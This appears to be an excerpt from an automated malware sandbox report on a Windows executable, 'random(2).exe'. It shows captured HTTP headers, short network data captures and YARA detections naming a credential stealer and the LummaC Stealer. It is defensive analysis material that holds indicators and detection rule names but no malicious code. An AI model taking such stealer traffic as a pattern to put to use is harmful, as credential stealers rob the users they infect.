cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmou721MFFcZ%2BVhtwkLBqf6wgn3MCuG7fX8nABsmtEVFZo5I2kUHS%2B90Lo8eymWFSUPMpO7iCjW1G8oAEmduEib5nZFEm%2FQwC%2FALXRs5lUrLZs%2B5mEDRLShzbcXhJULqpB048a3o1A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b82d37296414a8-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2006&min_rtt=2002&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3065&recv_bytes=1070&delivery_rate=2153392&cwnd=152&unsent_bytes=0&cid=5d249c41762dea96&ts=502&x=0"

2025-03-05 08:17:23 UTC | 54 | IN | Data Raw: 33 30 0d 0a 4e 6d 68 32 62 39 61 36 64 67 5a 54 6b 65 72 62 55 6d 68 39 34 74 65 33 6f 56 79 31 31 2b 2b 77 6e 48 66 77 6a 4f 77 4b 55 62 5a 74 4e 51 3d 3d 0d 0a
Data Ascii: 30Nmh2b9a6dgZTkerbUmh94te3oVy11++wnHfwjOwKUbZtNQ==

2025-03-05 08:17:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 03:16:51
Start date: 05/03/2025
Path: C:\Users\user\Desktop\random(2).exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\random(2).exe"
Imagebase: 0x5e0000
File size: 1'835'008 bytes
MD5 hash: 4C7602A935A7B24E6262ACD38505EB9A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1355119722.000000000120A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1366561400.0000000001207000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1594325672.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1365385074.0000000001207000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1293558753.0000000005020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true